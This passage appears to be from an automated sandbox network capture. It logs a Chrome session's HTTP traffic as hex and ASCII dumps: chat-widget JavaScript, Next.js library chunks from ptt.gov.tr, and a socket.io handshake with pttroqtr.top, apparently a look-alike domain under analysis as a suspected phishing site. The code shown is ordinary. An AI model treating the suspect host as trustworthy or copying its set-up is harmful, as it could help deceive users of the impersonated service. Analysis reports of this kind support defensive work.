                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 77 69 64 67 65 74 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 29 2c 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 69 6e 20 6d 61 73 74 65 72 50 61 67 65 43 73 73 29 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 26 26 6d 61 73 74 65 72 50 61 67 65 43 73 73 5b 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 5d 2e 66 75 6c 6c 73 69 7a 65 5f 73 74 61 74 75 73 2e 68 65 69 67 68 74 26 26 28 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 6d 61 73 74 65 72 50 61 67 65 43 73
                                                                                                                                                                                            Data Ascii: style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCs
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 2b 74 2b 22 3d 22 3b 66 6f 72 28 76 61 72 20 6f 2c 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 73 3d 30 3b 73 3c 69 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 66 6f 72 28 76 61 72 20 6e 3d 69 5b 73 5d 3b 22 20 22 3d 3d 6e 2e 63 68 61 72 41 74 28 30 29 3b 29 6e 3d 6e 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 69 66 28 30 3d 3d 6e 2e 69 6e 64 65 78 4f 66 28 6f 29 29 72 65 74 75 72 6e 20 6e 2e 73 75 62 73 74 72 69 6e 67 28 6f 2e 6c 65 6e 67 74 68 2c 6e 2e 6c 65 6e 67 74 68 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 41 6c 6f 54 65 63 68 47 41 45 76 65 6e 74 73 28 74 2c 65 2c 61 2c 6f 2c 69 2c 73 2c 6e 29 7b 22 6f 6e 22 3d 3d 3d 74 26 26 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 5f
                                                                                                                                                                                            Data Ascii: +t+"=";for(var o,i=document.cookie.split(";"),s=0;s<i.length;s++){for(var n=i[s];" "==n.charAt(0);)n=n.substring(1);if(0==n.indexOf(o))return n.substring(o.length,n.length)}return""}function sendAloTechGAEvents(t,e,a,o,i,s,n){"on"===t&&aloTechGetCookie("_
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 65 20 69 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 31 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 65 2e 62 65 66 6f 72 65 53 65 6e 64 28 29 2c 34 3d 3d 69 2e 72 65 61 64 79 53 74 61 74 65 26 26 28 65 2e 63 6f 6d 70 6c 65 74 65 28 69 2c 69 2e 73 74 61 74 75 73 29 2c 32 30 30 3d 3d 69 2e 73 74 61 74 75 73 7c 7c 30 3d 3d 69 2e 73 74 61 74 75 73 3f 65 2e 73 75 63 63 65 73 73 28 4a 53 4f 4e 2e 70 61 72 73 65 28 69 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 29 3a 28 65 2e 65 72 72 6f 72 28 69 2e 73 74 61 74 75 73 29 2c 76 6f 69 64 20 30 21 3d 3d 65 2e 73 74 61 74 75 73 43 6f 64 65 5b 69 2e 73 74 61 74 75 73 5d 26 26 65 2e 73 74 61 74 75 73 43 6f
                                                                                                                                                                                            Data Ascii: e i=new XMLHttpRequest;i.onreadystatechange=function(){1==i.readyState&&e.beforeSend(),4==i.readyState&&(e.complete(i,i.status),200==i.status||0==i.status?e.success(JSON.parse(i.responseText)):(e.error(i.status),void 0!==e.statusCode[i.status]&&e.statusCo
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 74 29 7d 61 2b 3d 22 26 70 61 67 65 5f 6f 72 69 67 69 6e 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 29 3b 76 61 72 20 6f 2c 69 3d 6e 75 6c 6c 2c 74 3d 6e 75 6c 6c 3b 69 66 28 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 26 26 28 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 3d 65 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 6e 61 6d 65 3d 65 2e 63 6c 69 65 6e 74 5f 6e 61 6d 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 5f 61 75 74 6f 5f 73 74 61 72 74 5f 65 6d 61 69 6c 3d 65 2e 63
                                                                                                                                                                                            Data Ascii: {console.log(t)}a+="&page_origin="+encodeURIComponent(window.location.origin);var o,i=null,t=null;if(e.scheduled_auto_start&&(this.scheduled_auto_start=e.scheduled_auto_start,this.scheduled_auto_start_name=e.client_name,this.scheduled_auto_start_email=e.c
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 22 2b 65 2e 63 75 73 74 6f 6d 69 7a 65 64 5f 68 74 6d 6c 2b 22 3f 22 2b 61 7d 3a 74 68 69 73 2e 69 66 72 61 6d 65 3d 7b 73 72 63 3a 22 68 74 74 70 73 3a 2f 2f 22 2b 74 2b 22 2f 63 6f 6e 74 65 6e 74 2f 73 70 61 2e 68 74 6d 6c 3f 22 2b 61 7d 7d 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 68 3d 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 3b 6c 65 74 20 6c 3d 21 31 2c 63 3d 21 31 3b 66 6f 72 28 63 75 72 55 52 4c 20 6f 66 5b 22 61 6c 6f 2d 74 65 63 68 2e 63 6f 6d 22 2c 22 63 61 6c 6c 63 65 6e 74 65 72 73 74 75 64 69 6f 2e 63 6f 6d 22 2c 22 6d 75 73 74 65 72 69 68 69 7a 6d 65 74 6c 65 72 69 2e 63 6f 6d 22 5d 29 68 26 26 30 3c 3d 68 2e 69
                                                                                                                                                                                            Data Ascii: iframe={src:"https://"+t+"/content/"+e.customized_html+"?"+a}:this.iframe={src:"https://"+t+"/content/spa.html?"+a}}var n=document.referrer,h=document.URL;let l=!1,c=!1;for(curURL of["alo-tech.com","callcenterstudio.com","musterihizmetleri.com"])h&&0<=h.i
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 4d 4f 42 49 4c 45 5f 53 43 52 45 45 4e 26 26 28 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 72 69 67 68 74 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 62 6f 74 74 6f 6d 22 2c 22 30 70 78 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 61 63 6a 73 5f 6e 65 61 72 5f 6c 65 66 74 26 26 73 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 6c 65 66 74 22
                                                                                                                                                                                            Data Ascii: _getHeight(e.widgetHeight.toString()+"px"),a.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),MOBILE_SCREEN&&(s.style.setProperty("right","0px","important"),s.style.setProperty("bottom","0px","important"),acjs_near_left&&s.style.setProperty("left"
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 28 29 7b 73 2e 73 74 79 6c 65 2e 62 6f 78 53 68 61 64 6f 77 3d 22 30 70 78 20 30 70 78 20 35 70 78 20 30 70 78 20 23 38 38 38 38 38 38 64 36 22 7d 2c 34 30 30 29 29 2c 22 6d 61 78 69 6d 69 73 65 22 3d 3d 3d 65 2e 63 68 61 6e 67 65 54 79 70 65 3f 28 73 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 73 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 63 68 61 74 5f 67 65 74 57 69 64 74 68 28 65 2e 77 69 64 67 65 74 57 69 64 74 68 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 70 78 22 29 2c 61 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 63 68 61 74 5f 67 65 74 48 65 69 67 68 74 28 65 2e 77 69 64 67 65 74 48 65 69 67 68 74 2e 74 6f 53 74 72 69
                                                                                                                                                                                            Data Ascii: (){s.style.boxShadow="0px 0px 5px 0px #888888d6"},400)),"maximise"===e.changeType?(s.style.height=chat_getHeight(e.widgetHeight.toString()+"px"),s.style.width=chat_getWidth(e.widgetWidth.toString()+"px"),a.style.height=chat_getHeight(e.widgetHeight.toStri
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 65 6e 74 5f 6e 61 6d 65 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 2c 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 3a 61 6c 6f 54 65 63 68 47 65 74 43 6f 6f 6b 69 65 28 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 2e 68 6f 73 74 6e 61 6d 65 29 7d 29 2c 22 63 75 73 74 6f 6d 65 72 5f 68 69 73 74 6f 72 79 22 69 6e 20 41 6c 6f 43 68 61 74 2e 70 61 72 61 6d 73 26 26 41 6c 6f 43 68 61 74 2e 70 61 72
                                                                                                                                                                                            Data Ascii: ent_name:aloTechGetCookie("client_name",e.alotech_data.hostname),client_email:aloTechGetCookie("client_email",e.alotech_data.hostname),phone_number:aloTechGetCookie("phone_number",e.alotech_data.hostname)}),"customer_history"in AloChat.params&&AloChat.par
                                                                                                                                                                                            2024-09-28 03:39:41 UTC1390INData Raw: 6c 6c 28 22 2e 61 6c 6f 74 65 63 68 2d 63 68 61 74 2d 62 6f 64 79 22 29 2c 6e 3d 30 3b 6e 3c 69 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 26 26 76 6f 69 64 20 30 3d 3d 3d 68 26 26 28 68 3d 69 5b 6e 5d 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 66 72 61 6d 65 22 29 29 3b 76 61 72 20 6c 2c 63 3d 22 22 3b 66 6f 72 28 6c 20 69 6e 20 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 29 61 6c 6f 54 65 63 68 53 65 74 43 6f 6f 6b 69 65 28 6c 2c 65 2e 61 6c 6f 74 65 63 68 5f 64 61 74 61 5b 6c 5d 2c 22 63 6c 69 65 6e 74 5f 6e 61 6d 65 22 3d 3d 3d 6c 7c 7c 22 63 6c 69 65 6e 74 5f 65 6d 61 69 6c 22 3d 3d 3d 6c 7c 7c 22 70 68 6f 6e 65 5f 6e 75 6d 62 65 72 22 3d 3d 3d 6c 3f 37 33 30 3a 31 2c
                                                                                                                                                                                            Data Ascii: ll(".alotech-chat-body"),n=0;n<i.length;n++)i[n].querySelector("iframe")&&void 0===h&&(h=i[n].querySelector("iframe"));var l,c="";for(l in e.alotech_data)aloTechSetCookie(l,e.alotech_data[l],"client_name"===l||"client_email"===l||"phone_number"===l?730:1,


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            125192.168.2.5498518.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:40 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjd67 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:41 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:41 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 118
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:41 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 5a 74 77 61 69 47 79 45 4f 30 44 5f 6a 72 45 68 41 45 66 36 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                            Data Ascii: 0{"sid":"ZtwaiGyEO0D_jrEhAEf6","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            126192.168.2.549853185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:41 UTC605OUTGET /_next/static/chunks/pages/_app-a58333aebeb24bd1.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:41 UTC401INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"345f0-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:41 GMT
                                                                                                                                                                                            Content-Length: 214512
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:41 UTC6870INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 38 38 38 5d 2c 7b 32 34 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 65 6e 2f 47 65 74 4c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 52 65 73 70 6f 6e 73 65 22 3a 5b 36 38 35 35 2c 36 38 35 35 5d 2c 22 2e 2f 65 6e 2f 47 65 74 4c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 52 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 22 3a 5b 36 38 35 35 2c 36 38 35 35 5d 2c 22 2e 2f 74 72 2f 47 65 74 4c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 52 65 73 70 6f 6e 73 65 22 3a 5b 36 32 31 39 2c 33 34 30 31 5d 2c 22 2e 2f 74 72 2f 47 65 74 4c 61 6e 67 75 61 67 65 52
                                                                                                                                                                                            Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{242:function(e,t,n){var r={"./en/GetLanguageResourceResponse":[6855,6855],"./en/GetLanguageResourceResponse.json":[6855,6855],"./tr/GetLanguageResourceResponse":[6219,3401],"./tr/GetLanguageR
                                                                                                                                                                                            2024-09-28 03:39:41 UTC7271INData Raw: 65 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 68 61 6e 64 6c 65 43 61 6c 6c 62 61 63 6b 28 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 63 6c 6f 73 65 74 61 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6c 61 73 74 4e 6f 64 65 3d 6e 75 6c 6c 3b 76 61 72 20 65 3d 74 68 69 73 2e 74 61 67 53 74 61 63 6b 2e 70 6f 70 28 29 3b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 77 69 74 68 45 6e 64 49 6e 64 69 63 65 73 26 26 28 65 2e 65 6e 64 49 6e 64 65 78 3d 74 68 69 73 2e 70 61 72 73 65 72 2e 65 6e 64 49 6e 64 65 78 29 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 43 42 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 43 42 28 65 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 6e 6f 70 65 6e 74 61 67 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                            Data Ascii: e.onerror=function(e){this.handleCallback(e)},e.prototype.onclosetag=function(){this.lastNode=null;var e=this.tagStack.pop();this.options.withEndIndices&&(e.endIndex=this.parser.endIndex),this.elementCB&&this.elementCB(e)},e.prototype.onopentag=function(e
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 2c 66 5b 22 78 2d 73 79 73 74 65 6d 49 64 22 5d 3d 65 5b 22 78 2d 73 79 73 74 65 6d 49 64 22 5d 29 2c 6e 3d 66 7d 72 65 74 75 72 6e 20 6e 2e 73 74 61 72 74 49 6e 64 65 78 3d 65 2e 73 74 61 72 74 49 6e 64 65 78 2c 6e 2e 65 6e 64 49 6e 64 65 78 3d 65 2e 65 6e 64 49 6e 64 65 78 2c 6e 75 6c 6c 21 3d 65 2e 73 6f 75 72 63 65 43 6f 64 65 4c 6f 63 61 74 69 6f 6e 26 26 28 6e 2e 73 6f 75 72 63 65 43 6f 64 65 4c 6f 63 61 74 69 6f 6e 3d 65 2e 73 6f 75 72 63 65 43 6f 64 65 4c 6f 63 61 74 69 6f 6e 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 78 28 65 2c 21 30 29 7d 29 29 2c 6e 3d 31 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 5b 6e 5d 2e 70 72 65
                                                                                                                                                                                            Data Ascii: ,f["x-systemId"]=e["x-systemId"]),n=f}return n.startIndex=e.startIndex,n.endIndex=e.endIndex,null!=e.sourceCodeLocation&&(n.sourceCodeLocation=e.sourceCodeLocation),n}function T(e){for(var t=e.map((function(e){return x(e,!0)})),n=1;n<t.length;n++)t[n].pre
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 6e 3a 63 7d 7d 2c 35 35 36 30 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 2f 5c 2f 5c 2a 5b 5e 2a 5d 2a 5c 2a 2b 28 5b 5e 2f 2a 5d 5b 5e 2a 5d 2a 5c 2a 2b 29 2a 5c 2f 2f 67 2c 6e 3d 2f 5c 6e 2f 67 2c 72 3d 2f 5e 5c 73 2a 2f 2c 6f 3d 2f 5e 28 5c 2a 3f 5b 2d 23 2f 2a 5c 5c 5c 77 5d 2b 28 5c 5b 5b 30 2d 39 61 2d 7a 5f 2d 5d 2b 5c 5d 29 3f 29 5c 73 2a 2f 2c 61 3d 2f 5e 3a 5c 73 2a 2f 2c 69 3d 2f 5e 28 28 3f 3a 27 28 3f 3a 5c 5c 27 7c 2e 29 2a 3f 27 7c 22 28 3f 3a 5c 5c 22 7c 2e 29 2a 3f 22 7c 5c 28 5b 5e 29 5d 2a 3f 5c 29 7c 5b 5e 7d 3b 5d 29 2b 29 2f 2c 63 3d 2f 5e 5b 3b 5c 73 5d 2a 2f 2c 73 3d 2f 5e 5c 73 2b 7c 5c 73 2b 24 2f 67 2c 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28
                                                                                                                                                                                            Data Ascii: n:c}},5560:function(e){var t=/\/\*[^*]*\*+([^/*][^*]*\*+)*\//g,n=/\n/g,r=/^\s*/,o=/^(\*?[-#/*\\\w]+(\[[0-9a-z_-]+\])?)\s*/,a=/^:\s*/,i=/^((?:'(?:\\'|.)*?'|"(?:\\"|.)*?"|\([^)]*?\)|[^};])+)/,c=/^[;\s]*/,s=/^\s+|\s+$/g,l="";function u(e){return e?e.replace(
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 65 2c 74 29 7d 28 65 2c 74 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 6e 65
                                                                                                                                                                                            Data Ascii: e,t)}(e,t)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function o(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=ne
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 2c 65 64 67 65 4d 6f 64 65 3a 31 2c 65 6c 65 76 61 74 69 6f 6e 3a 30 2c 65 6e 61 62 6c 65 42 61 63 6b 67 72 6f 75 6e 64 3a 31 2c 22 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 65 6e 61 62 6c 65 42 61 63 6b 67 72 6f 75 6e 64 22 2c 65 6e 64 3a 30 2c 65 78 70 6f 6e 65 6e 74 3a 30 2c 65 78 74 65 72 6e 61 6c 52 65 73 6f 75 72 63 65 73 52 65 71 75 69 72 65 64 3a 31 2c 66 69 6c 6c 3a 30 2c 66 69 6c 6c 4f 70 61 63 69 74 79 3a 31 2c 22 66 69 6c 6c 2d 6f 70 61 63 69 74 79 22 3a 22 66 69 6c 6c 4f 70 61 63 69 74 79 22 2c 66 69 6c 6c 52 75 6c 65 3a 31 2c 22 66 69 6c 6c 2d 72 75 6c 65 22 3a 22 66 69 6c 6c 52 75 6c 65 22 2c 66 69 6c 74 65 72 3a 30 2c 66 69 6c 74 65 72 52 65 73 3a 31 2c 66 69 6c 74 65 72 55 6e 69 74 73 3a 31 2c 66 6c 6f 6f 64 4f 70 61 63
                                                                                                                                                                                            Data Ascii: ,edgeMode:1,elevation:0,enableBackground:1,"enable-background":"enableBackground",end:0,exponent:0,externalResourcesRequired:1,fill:0,fillOpacity:1,"fill-opacity":"fillOpacity",fillRule:1,"fill-rule":"fillRule",filter:0,filterRes:1,filterUnits:1,floodOpac
                                                                                                                                                                                            2024-09-28 03:39:42 UTC7271INData Raw: 2c 68 61 6e 64 6c 65 43 68 61 6e 67 65 57 72 61 70 70 65 72 3a 6f 2c 69 73 53 75 62 73 63 72 69 62 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 6e 29 7d 2c 74 72 79 53 75 62 73 63 72 69 62 65 3a 61 2c 74 72 79 55 6e 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 26 26 28 6e 28 29 2c 6e 3d 76 6f 69 64 20 30 2c 72 2e 63 6c 65 61 72 28 29 2c 72 3d 45 29 7d 2c 67 65 74 4c 69 73 74 65 6e 65 72 73 3a 28 29 3d 3e 72 7d 3b 72 65 74 75 72 6e 20 69 7d 63 6f 6e 73 74 20 53 3d 21 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 7c 7c 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                            Data Ascii: ,handleChangeWrapper:o,isSubscribed:function(){return Boolean(n)},trySubscribe:a,tryUnsubscribe:function(){n&&(n(),n=void 0,r.clear(),r=E)},getListeners:()=>r};return i}const S=!("undefined"===typeof window||"undefined"===typeof window.document||"undefine
